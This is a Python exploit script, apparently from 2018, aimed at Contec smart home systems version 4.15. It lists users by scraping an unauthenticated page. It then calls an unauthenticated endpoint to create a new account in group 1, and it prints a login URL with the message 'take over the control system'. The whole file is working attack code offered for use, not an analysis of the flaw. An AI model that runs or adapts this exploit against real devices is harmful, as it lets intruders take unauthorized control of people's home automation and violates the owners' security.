contexploit.py

#!/usr/bin/env python
"""
Copyright (c) 2018 Blackhole Security. all right reserved.
"""
class colour():
    green  = '\033[92m'
    greenn = '\033[92;7m'
    red    = '\033[91m'
    redd   = '\033[91;7m'
    white  = '\033[0m'
import time, argparse, sys, re
try:
    import requests
except ImportError:
    print(colour.red+'\nPlease install requests module')
    sys.exit()
try:
    from bs4 import BeautifulSoup
except ImportError:
    print('\nPlease install bs4 module')
    sys.exit()

def true_ipv4(ip):
        ip = args.target
        match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", args.target)
        if not match: return False
        quad = []
        for number in match.groups(): quad.append(int(number))
        if quad[0] < 1: return False
        for number in quad:
            if number > 255 or number < 0: return False
        return True

def usage_msg(name=None):
    return '''python contexploit.py -t http://<ip>:<port> --list-user'''
opts = argparse.ArgumentParser(description="Contec smart home Unauthorized Users Added. (Affected version : 4.15)", usage=usage_msg())
opts.add_argument('-v', '--version', action="version", version="v1.0",
                   help="Show version and exit")
opts.add_argument('-t', '--target', dest="target", action="store", default=False,
                   help="Target address (e.g. http://<ip>:<port>)", required=True)
opts.add_argument('-l', '--list-user', dest="list", action="store_true",
                   help="Grap all user list on the web server")
opts.add_argument('-u', '--new-user', dest="user", action="store", default=False,
                   help="New username")
opts.add_argument('-p', '--new-password', dest="password", action="store", default=False,
                   help="New password")
args = opts.parse_args()

if __name__ == '__main__':
    correct_port = "9000"
    url = args.target
    sub_link1 = args.user
    sub_link2 = args.password
    header = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36'}
    if args.target and args.list:
        print(colour.greenn+"Trying to get the user list..."+colour.white)
        time.sleep(2)
        try:
            if args.target and correct_port in args.target:
                req = requests.get(url + '/content/user.php', headers=header, timeout=10)
                req.raise_for_status()
                soup = BeautifulSoup(req.content, "html.parser")
                for script in soup(["script", "style"]):
                    script.decompose()

                text = soup.get_text()
                lines = (line.strip() for line in text.splitlines())
                chunks = (phrase.strip() for line in lines for phrase in line.split(" "))
                text = '\n'.join(chunk for chunk in chunks if chunk)
                clear_text = text.encode(sys.stdout.encoding)
                print("""{0}\n{1} Available users : \n{2}""".format(colour.green, colour.white, clear_text))
                sys.exit()

            else:
                print(colour.redd+'\nOops,, something went wrong, it looks like your target is not a SmartHome System'+colour.white)
                sys.exit()

        except requests.exceptions.HTTPError as error_1:
            print("""{0}\n[x]{1} Http Error : {2}""".format(colour.red, colour.white, error_1))
            sys.exit()
        except requests.exceptions.ConnectionError as error_2:
            print("""{0}\n[x]{1} Error Connecting : {2}""".format(colour.red, colour.white, error_2))
            sys.exit()
        except requests.exceptions.Timeout as error_3:
            print("""{0}\n[x]{1} Timeout Error : {2}""".format(colour.red, colour.white, error_3))
            sys.exit()
        except requests.exceptions.RequestException as error_4:
            print("""{0}\n[x]{1} Another Error : {2}""".format(colour.red, colour.white, error_4))
            sys.exit()
        except(KeyboardInterrupt):
            print(colour.redd+"Killing Process"+colour.white)
            sys.exit()
    if args.target and args.user and args.password:
        try:
            print(colour.greenn+'Attempt to adding new users...'+colour.white)
            time.sleep(2)
            if args.target and correct_port not in args.target:
                print(colour.redd+'\nOops,, something went wrong, it looks like your target is not a SmartHome System'+colour.white)
                sys.exit()
            r = requests.get(url + """/content/new_user.php?user_name="""+sub_link1+"""&password="""+sub_link2+"""&group_id=1""", headers=header, timeout=10)
            r.status_code
            r.raise_for_status()
            if r.ok:
                print(colour.greenn+"""\nSuccessfully added new users"""+colour.white)
                print("""\n    username   : """+colour.greenn+args.user+colour.white+""" """)
                print("""    password   : """+colour.greenn+args.password+colour.white+""" """)
                print("""    login page : """+colour.redd+args.target+"""/content/smarthome.php """+colour.white)
                print("""\nopen that URL and login with those credentials to take over the control system""")
                sys.exit()
            else:
                print(colour.redd+'\nFailed to add new users, it looks like your target is not a SmartHome System'+colour.white)
                sys.exit()

        except requests.exceptions.RequestException:
            print(colour.redd+'\nFailed to add new users, it looks like your target is not a SmartHome System'+colour.white)
            sys.exit()
        except(KeyboardInterrupt):
            print(colour.redd+"Killing Process"+colour.white)
            sys.exit()
    else:
        print(colour.redd+'\nError : some arguments is missing'+colour.white)
        sys.exit()